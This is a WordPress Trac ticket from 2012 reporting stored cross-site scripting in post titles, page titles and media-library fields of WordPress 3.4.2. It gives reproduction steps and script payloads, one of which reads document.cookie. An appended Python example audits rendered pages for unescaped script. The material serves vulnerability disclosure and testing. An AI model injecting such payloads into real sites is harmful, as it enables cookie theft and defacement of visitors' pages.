[wp-trac] [WordPress Trac] #21917: Wordpress 3.4.2 - Multiple XSS Vulnerability

WordPress Trac wp-trac at lists.automattic.com
Tue Sep 18 04:36:29 UTC 2012


#21917: Wordpress 3.4.2 - Multiple XSS Vulnerability
-----------------------------+--------------------------
 Reporter:  nuxbie           |       Type:  defect (bug)
   Status:  new              |   Priority:  normal
Milestone:  Awaiting Review  |  Component:  General
  Version:  3.4.2            |   Severity:  normal
 Keywords:                   |
-----------------------------+--------------------------
 [ Wordpress 3.4.2 - Multiple XSS Vulnerability ]

 Hello, my name is Catur Febrian (nuxbie).
 I have found bugs in the new WordPress web app (last version).
 These bugs are XSS (Cross-Site Scripting).
 WordPress 3.4.2 has multiple vulnerabilities.
 1. XSS WP-Post.
 2. XSS WP-Page.
 3. XSS WP-MediaLibrary.

 Please, read my exploit report... :-)

 Exploit Title: CMS Wordpress - Multiple XSS Vulnerability
 Author       : TheCyberNuxbie [ Catur Febrian ]
 E-mail       : root at 31337sec.com
 Version CMS  : Version 3.4.2 (Last Version)
 Category     : WebApps / Content Management System (CMS)
 Security Risk: Medium Level
 Link Download: http://www.wordpress.org/
 Tested On    : Mozilla Firefox + Xampp + Windows 7 x32 ID

 [ Information Content ]
 WordPress - Web Publishing Software.
 http://www.wordpress.org/

 [ Vulnerability Details ]
 1. XSS WP-Post.
 2. XSS WP-Page.
 3. XSS WP-MediaLibrary.

 [ XSS CODE ]
 <script>alert('31337');</script>
 <script>alert(document.cookie);</script>
 <script>window.open("http://www.google.com/")</script>

 - Exploit Report:
 1. Create / Edit WP-Post:
 Input "Title Post" with Script XSS.
 <script>alert('31337');</script>
 http://wordpress/wp-admin/post-new.php <--- Publish.
 View XSS: http://wordpress/?p=xxx <--- XSSed.
 PIC: http://31337sec.com/wordpress/xss-post1.jpg +
 http://31337sec.com/wordpress/xss-post2.jpg

 2. Create / Edit WP-Page:
 Input "Title Page" with Script XSS.
 <script>alert('31337');</script>
 http://wordpress/wp-admin/post-new.php?post_type=page <--- Publish.
 View XSS: http://wordpress/?page_id=xxx <--- XSSed.
 PIC: http://31337sec.com/wordpress/xss-page1.jpg +
 http://31337sec.com/wordpress/xss-page2.jpg

 3. Add / Edit WP-Media Library:
 Upload files via Media Library.
 http://wordpress/wp-admin/media-new.php <--- Select File.
 Upload Files, Save...!!!
 Input Form "Title", "Caption", "Description" with Script XSS <--- Save All
 Changes.
 View XSS: http://wordpress/?attachment_id=xxx <--- XSSed.
 PIC: http://31337sec.com/wordpress/xss-media1.jpg +
 http://31337sec.com/wordpress/xss-media2.jpg +
 http://31337sec.com/wordpress/xss-media3.jpg

 - Script XSS will affect:
 1. Frontend Website (post).
 http://wordpress/?p=xxx <--- XSSed.
 2. Frontend Website (page).
 http://wordpress/?page_id=xxx <--- XSSed.
 3. Frontend Website (attachment).
 http://wordpress/?attachment_id=xxx <--- XSSed.

 Thanks...
 TheCyberNuxbie

-- 
Ticket URL: <http://core.trac.wordpress.org/ticket/21917>
WordPress Trac <http://core.trac.wordpress.org/>
WordPress blogging software
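
A way to re-check the three frontend views listed in the report, as an added example that is not part of the original ticket or of WordPress: it parses rendered HTML and reports which field let the report's test string land inside a live `<script>` element instead of appearing as escaped text. The page markup and the class names `entry-title`, `caption` and `description` are constructed for illustration.

```python
from html.parser import HTMLParser

MARKER = "alert('31337')"  # test string quoted in the report
VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input",
        "link", "meta", "source", "track", "wbr"}

class ScriptContextFinder(HTMLParser):
    """Records each <script> body containing the marker, with its parent's class."""

    def __init__(self, marker):
        super().__init__(convert_charrefs=True)
        self.marker = marker
        self.stack = []  # (tag, class) of currently open elements
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag not in VOID:
            self.stack.append((tag, dict(attrs).get("class") or ""))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerate unclosed children.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

    def handle_data(self, data):
        # Escaped markup arrives here as text under a non-script parent: inert.
        if self.stack and self.stack[-1][0] == "script" and self.marker in data:
            parent = self.stack[-2][1] if len(self.stack) > 1 else ""
            self.hits.append(parent or "(no class)")

def executable_fields(html, marker=MARKER):
    finder = ScriptContextFinder(marker)
    finder.feed(html)
    finder.close()
    return finder.hits

# Constructed sample output for the three views named in the report.
RAW = "<script>alert('31337');</script>"
ESCAPED = "&lt;script&gt;alert(&#039;31337&#039;);&lt;/script&gt;"
PAGES = {
    "/?p=xxx": f'<h1 class="entry-title">{RAW}</h1>',
    "/?page_id=xxx": f'<h1 class="entry-title">{ESCAPED}</h1>',
    "/?attachment_id=xxx": f'<h1 class="entry-title">{ESCAPED}</h1>'
                           f'<p class="caption">{RAW}</p>'
                           f'<div class="description">{ESCAPED}</div>',
}

def audit(pages):
    return {url: executable_fields(html) for url, html in pages.items()}
```

An empty list for a view means the stored string was rendered as inert text there; a non-empty list names the container whose output was not escaped.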